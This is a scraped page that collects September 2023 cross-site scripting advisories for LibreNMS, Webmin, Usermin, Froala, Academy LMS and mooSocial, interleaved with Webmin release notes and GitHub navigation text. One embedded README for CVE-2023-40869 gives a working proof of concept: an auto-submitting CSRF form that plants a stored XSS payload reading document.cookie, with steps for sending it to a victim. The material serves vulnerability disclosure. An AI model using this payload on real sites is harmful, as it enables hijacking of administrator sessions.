Cross-site Scripting (XSS) - DOM in GitHub repository librenms/librenms prior to 23.9.0.

**LibreNMS Cross-site Scripting vulnerability**

High severity GitHub Reviewed Published Sep 15, 2023 to the GitHub Advisory Database • Updated Sep 15, 2023

GHSA-5jjm-qp48-qp86: LibreNMS Cross-site Scripting vulnerability

Cross-site Scripting (XSS) - Stored in GitHub repository librenms/librenms prior to 23.9.0.

**LibreNMS Cross-site Scripting vulnerability**

Critical severity GitHub Reviewed Published Sep 15, 2023 to the GitHub Advisory Database • Updated Sep 15, 2023

GHSA-m6jj-fgmh-3p8r: LibreNMS Cross-site Scripting vulnerability

A stored cross-site scripting (XSS) vulnerability in Webmin v2.100 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the cloned module name parameter.

Webmin is a web-based system administration tool for Unix-like servers, and services with about 1,000,000 yearly installations worldwide. Using it, it is possible to configure operating system internals, such as users, disk quotas, services or configuration files, as well as modify, and control open-source apps, such as **BIND** DNS Server, **Apache** HTTP Server, **PHP**, **MySQL**, and many more.

Add support for Amazon Linux 2023 Fix a bug in Network Configuration module when parsing network size Fix Netplan related bugs in Network Configuration module Fix a bug with initial focus in Terminal module Fix to correctly compare Webmin semantic versions Fix to suppress output from monitor.pl command Fix bugs when reading and replying to HTML email in Usermin Assets File Size File Size Webmin Usermin webmin-2.102-1.noarch.rpm 40.8 MB usermin-2....

Add support for reading gzipped email messages Add error\_stderr API Fix to show correct locale for sudo-capable users webmin/authentic-theme#1663 Fix new signing key import on Debian and derivatives Fix to check if password hash format is valid for yescrypt and SHA512 Fix print email functionality for Read User Mail module (for both Webmin and Usermin) Fix various XSS related issues Assets File Size File Size Webmin Usermin webmin-2.101-1.noarch.rpm 40.8 MB usermin-2....

Add full support for NetworkManager in Network Configuration module Add the Terminal module to Usermin Add support for WebGL in the Terminal module Add screen reader support in Terminal module Add significant improvements to read, reply and compose mail functionality Add support for loading images via the server when reading mail Add support for showing defaults for options in PHP Configuration module Add new pagination mode in Users and Groups module Fix correctly displaying bridges with Netplan in Network Configuration module Fix displaying active network interfaces in Network Configuration module Fix to consider current drive temperature in smartctl output #1881 Fix to properly stop Usermin usermin/issues/89 Fix no to add hashed password to the old password list twice Fix displaying placeholder on input to reflect strftime-style format Update Authentic theme to the latest version adding new vertical column layout Assets File Size File Size Webmin Usermin webmin-2....

Fix support for enabling and disabling the HTTP2 protocol Fix several bugs in the creation of AAAA and MX records Fix bugs in the management of secondary mail servers Fix creating mail forwards and auto-replies Add automatic use of Cloud credentials if available when backing up to S3 or GCS running on Amazon EC2 or Google Compute Engine

Add ability to host DNS zones on remote Webmin servers Add support for EC SSL certificates Add support for remote databases for PostgreSQL in the same way as MySQL Add an option to share the same DNS zone file with different owners

Add ability to set locale in Webmin Users module for consistency Fix to preserve initial install directory when upgrading manually Fix to preserve minimal install type when upgrading manually Fix an error when make\_date is called on undefined value #1860 Fix clearing packages caches before checking for updates in status collection #1863 Update the Authentic theme to the latest version Assets File Size webmin-2.021-1.noarch.rpm 39.6 MB webmin\_2.021\_all.deb 32.5 MB webmin-2....

Add full locale support Add slave zone file format option in BIND DNS module Add support for editing ACLs in File Manager Add support to configure SSL connection for MySQL/MariaDB module Add support for compressed backups in PostgreSQL module Add support for displaying inodes too in Disk Usage in the Dashboard Add better support for CloudLinux Fix to always default to RSA key type in Let’s Encrypt requests Fix setup repository script for Oracle Fix shutdown timeout to avoid termination of running processes Fix support for SpamAssassin 4 Fix to use system default hashing format for htpasswd file Fix FastRPC issues Update the Authentic theme to the latest version, with sped-up Dashboard performance Assets File Size webmin-2....

Fix Authentic theme issue with error handling Fix Framed theme to respect selected mode in left menu Assets File Size webmin-2.013-1.noarch.rpm 39.9 MB webmin\_2.013\_all.deb 32.7 MB webmin-2.013.tar.gz 44.9 MB webmin-2.013.pkg.gz 44.3 MB

Fix to set the correct algorithm when setting up RNDC #1817 Fix the loop bug when sourcing other network configs in Debian Fix to include all Debian network config files in backups Fix to stop doing expensive package re-fetch on upgrades Add support for defining hostname for WebSocket connection Add Debian 12 support Assets File Size webmin-2.012-1.noarch.rpm 39.9 MB webmin\_2.012\_all.deb 32.7 MB webmin-2.012.tar.gz 44.9 MB webmin-2.012.pkg.gz 44.3 MB

Add ability to set shell character encoding and set TERM environmental variable in the new Terminal module Add support for editing network interfaces in include files for Debian systems Add various improvements to the old good Framed Theme Fix to change Gray Framed Theme name to Framed Theme Fix to verify and close WebSocket session, if parent session was closed Fix to remove RC4 from the list of strong ciphers Fix don’t fail LDAP user or group deletion, if they have already been deleted Fix error handling in MySQL/MariaDB Database server module when executing SQL commands Fix adding an extra server attachment field and other bugs in Read User Mail module Fix the link to release notes for Rocky Linux Fix issues with freezing and thawing dynamic reverse zones in BIND DNS Server module Fix bugs for modules granting anonymous access Fix mailbox\_idle\_check\_interval option related bugs in Dovecot module sourceforge....

CVE-2023-40982: Webmin

A vulnerability was found in Academy LMS 6.2 on Windows. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument searched_word/searched_tution_class_type[]/searched_price_type[]/searched_duration[] leads to cross site scripting. The attack can be launched remotely. The identifier VDB-239749 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2023-4973

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-4982: Fix injection vulnerability in fdb search page (#15315) · librenms/librenms@2c59606

Froala Editor v4.0.1 to v4.1.1 was discovered to contain a cross-site scripting (XSS) vulnerability.

**Froala Editor Cross-site Scripting vulnerability**

Moderate severity GitHub Reviewed Published Sep 15, 2023 to the GitHub Advisory Database • Updated Sep 15, 2023

GHSA-hvpq-7vcc-5hj5: Froala Editor Cross-site Scripting vulnerability

CVE-2023-41592: OWASP Top Ten | OWASP Foundation

Cross Site Scripting vulnerability in mooSocial mooSocial Software 3.1.6 and 3.1.7 allows a remote attacker to execute arbitrary code via a crafted script to the edit_menu, copuon, and group_categorias functions.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

\# CVE-2023-40869
Cross Site Scripting vulnerability in mooSocial mooSocial Software v.3.1.6 and 3.1.7 allows a remote attacker to execute arbitrary code via a crafted script to the edit\_menu, copuon, and group\_categorias functions

XSS STORE via CSRF.

#Paths Affected
http://admin-socialcommerce.moosocial.com/admin/group/group\_categories
http://admin-socialcommerce.moosocial.com/admin/coupon/
http://admin-socialcommerce.moosocial.com/admin/menu/manage/edit\_menu/6

Poc:

1 - Make a file with this HTML and with and include XSS PAYLOAD

<html>
  <body>
    <form action="http://admin-socialcommerce.moosocial.com/admin/group/group\_categories/save" method="POST">
      <input type="hidden" name="data&#91;id&#93;" value="" />
      <input type="hidden" name="data&#91;name&#93;" value="test&quot;&gt;&lt;img&#32;src&#61;a&#32;onerror&#61;alert&#40;document&#46;cookie&#41;&gt;test" />   ##payload in this example and encoded : test"><img src=a onerror=alert(document.cookie)>test
      <input type="hidden" name="data&#91;type&#93;" value="Group" />
      <input type="hidden" name="data&#91;header&#93;" value="0" />
      <input type="hidden" name="data&#91;header&#93;" value="1" />
      <input type="hidden" name="data&#91;parent&#95;id&#93;" value="0" />
      <input type="hidden" name="data&#91;description&#93;" value="" />
      <input type="hidden" name="data&#91;active&#93;" value="0" />
      <input type="hidden" name="data&#91;active&#93;" value="1" />
      <input type="hidden" name="data&#91;everyone&#93;" value="0" />
      <input type="hidden" name="data&#91;everyone&#93;" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms\[0\].submit();
    </script>
  </body>
</html>

2 - Example test.html

3 - Send to the victim

4 - When the victim open the html the file test.html will open in his navigator and when he will open and press click the code will inject a payload and will be store at the DataBase

**About**

Cross Site Scripting vulnerability in mooSocial mooSocial Software v.3.1.6 allows a remote attacker to execute arbitrary code via a crafted script to the edit\_menu, copuon, and group\_categorias functions

**Resources**

Readme

Activity

**Stars**

**0** stars

**Watchers**

**1** watching

**Forks**

**0** forks

CVE-2023-40869: GitHub - MinoTauro2020/CVE-2023-40869: Cross Site Scripting vulnerability in mooSocial mooSocial Software v.3.1.6 allows a remote attacker to execute arbitrary code via a crafted script to the edit_me

A Stored Cross-Site Scripting (XSS) vulnerability in the filter and forward mail tab in Usermin 2.001 allows remote attackers to inject arbitrary web script or HTML via the save to new folder named field while creating a new filter.

CVE-2023-41156: Usermin-2.001/CVE-2023-41156 at main · shindeanik/Usermin-2.001

A Stored Cross-Site Scripting (XSS) vulnerability in the SSH configuration tab in Usermin 2.001 allows remote attackers to inject arbitrary web script or HTML via the key name field while adding an authorized key.

Tag

#xss